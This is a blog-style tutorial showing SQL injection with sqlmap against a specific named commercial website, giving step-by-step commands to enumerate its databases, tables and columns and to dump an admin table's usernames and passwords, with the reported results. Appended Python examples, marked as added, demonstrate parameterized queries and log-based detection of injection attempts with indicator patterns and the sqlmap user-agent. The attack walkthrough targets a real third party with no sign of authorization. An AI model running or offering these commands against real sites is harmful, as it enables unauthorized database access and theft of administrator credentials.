SQL injection using Sqlmap
SQL injection is a code injection technique that can compromise or destroy a database, and it is one of the most common web hacking techniques. It works by placing malicious code in SQL statements through web page input. SQL injection can be carried out in many ways: manually, with sqlmap, or with Havij, but the best way is manual SQL injection. In another writeup I will discuss how to perform manual SQL injection. This time I will show SQL injection using sqlmap. sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes pre-installed in Kali Linux. One drawback of this tool is that it takes a long time to perform SQL injection, so I recommend manual SQL injection for this purpose.
For SQL injection, you first need to find a SQL injection point and test whether it is vulnerable. Our target for this blog is to find the admin username and password.
For this blog I am using this SQL injection point:
http://www.brightbrothers.co.in/products.php?id=28
This is a SQL injection point: if we append ( ' ) or %27 after 28, some content disappears from the page, so this injection point is vulnerable. We can try SQL injection here. Let's do it with sqlmap.
http://www.brightbrothers.co.in/products.php?id=28'
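To show why a single quote changes the page, here is an added Python example (not from the original post) that reproduces the vulnerable pattern against an in-memory SQLite table and places the parameterized fix beside it. The table, rows and product names are constructed for the example; they are not the site's data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a products table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (28, 'Sample product 28');
        INSERT INTO products VALUES (29, 'Sample product 29');
    """)
    return conn


def lookup_concat(conn, raw_id):
    """Vulnerable pattern: the id parameter is spliced into the SQL text.

    An appended quote makes the statement syntactically invalid, so the query
    fails and the page renders with its product content missing.
    Returns the matching names, or an 'error: ...' string when the query fails.
    """
    sql = "SELECT name FROM products WHERE id = " + raw_id
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return f"error: {exc}"


def lookup_param(conn, raw_id):
    """Hardened pattern: the id travels as a bound parameter, never as SQL text.

    Whatever the client sends is compared as a value; a string such as "28'"
    is not a number, so it simply matches no row and the query still succeeds.
    """
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (raw_id,))]


def demo():
    """Run both lookups over a normal id and the quote-appended probe."""
    conn = make_db()
    inputs = ["28", "28'"]
    return {raw: (lookup_concat(conn, raw), lookup_param(conn, raw)) for raw in inputs}


if __name__ == "__main__":
    for raw, (concat, param) in demo().items():
        print(f"{raw!r:8} concatenated  -> {concat}")
        print(f"{'':8} parameterized -> {param}")
```

The concatenated version answers the probe with a database error, which is the content loss the post observes; the parameterized version returns an empty result for the same input and never lets the quote reach the SQL parser.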
Step 1: Open a terminal and type sqlmap. For the tool's manual you can use man sqlmap.
Step 2: First we need to find the database name, so we use this command:
sqlmap -u 'TARGET_URL' --dbs
sqlmap -u 'http://www.brightbrothers.co.in/products.php?id=28' --dbs
We get two databases: one is britedb121 and the other is information_schema. We continue with britedb121.
Step 3: Now that we have the database name, we need to find the table names, so use this command:
sqlmap -u 'TARGET_URL' -D db_name --tables
sqlmap -u 'http://www.brightbrothers.co.in/products.php?id=28' -D britedb121 --tables
We get 9 tables. One of them is the admin table, so for the admin information we need to use the admin table.
Step 4: We have the database name and the table name; now we need to find the column names of the admin table, so use this command:
sqlmap -u 'TARGET_URL' -D db_name -T table_name --columns
sqlmap -u 'http://www.brightbrothers.co.in/products.php?id=28' -D britedb121 -T admin --columns
We get 2 columns: user and password.
Step 5: Now we have the database, table and column names, and we want to dump the data from those columns to find the username and password, so use this command:
sqlmap -u 'TARGET_URL' -D db_name -T table_name -C columns --dump
sqlmap -u 'http://www.brightbrothers.co.in/products.php?id=28' -D britedb121 -T admin -C user,pass --dump
We get the username and password. Sometimes the password is stored in encrypted or hashed form rather than in plain text; in that case it has to be recovered before it can be used.
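From the defender's side, the five steps above produce a burst of requests to one endpoint whose id parameter carries quotes, SQL keywords and references to information_schema, and whose User-Agent by default identifies sqlmap. Here is an added Python example (not part of the original post) that runs that detection logic over a few constructed access-log lines in Apache combined format; the IP addresses, timestamps, payloads, threshold and User-Agent string are all made up for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products.php?id=28 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /products.php?id=28%27 HTTP/1.1" 200 3100 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /products.php?id=28%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:13:56:03 +0000] "GET /products.php?id=28%20UNION%20ALL%20SELECT%20NULL%2Ctable_name%20FROM%20information_schema.tables HTTP/1.1" 200 4800 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /products.php?id=29 HTTP/1.1" 200 5010 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicators checked against the URL-decoded query string.
INDICATORS = [
    ("quote", re.compile(r"'")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("boolean_test", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
]


def indicators_for(target, ua):
    """Return the indicator names that fire for one request."""
    decoded = unquote_plus(urlsplit(target).query)
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    if "sqlmap" in ua.lower():
        hits.append("sqlmap_user_agent")
    return hits


def analyse(log_text, threshold=2):
    """Group flagged requests per client IP; alert when a client reaches the threshold.

    Returns {ip: {"requests": flagged_count, "indicators": sorted names}}.
    """
    per_ip = Counter()
    details = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        hits = indicators_for(m["target"], m["ua"])
        if hits:
            per_ip[m["ip"]] += 1
            details.setdefault(m["ip"], set()).update(hits)
    return {
        ip: {"requests": n, "indicators": sorted(details[ip])}
        for ip, n in per_ip.items()
        if n >= threshold
    }


if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(f"{ip}: {info['requests']} suspicious requests, indicators={info['indicators']}")
```

The User-Agent is client-controlled and easily changed, so it is only a supporting signal; the query-string indicators and the per-client request count are what carry the alert, and the threshold keeps a single stray quote in a legitimate request from paging anyone.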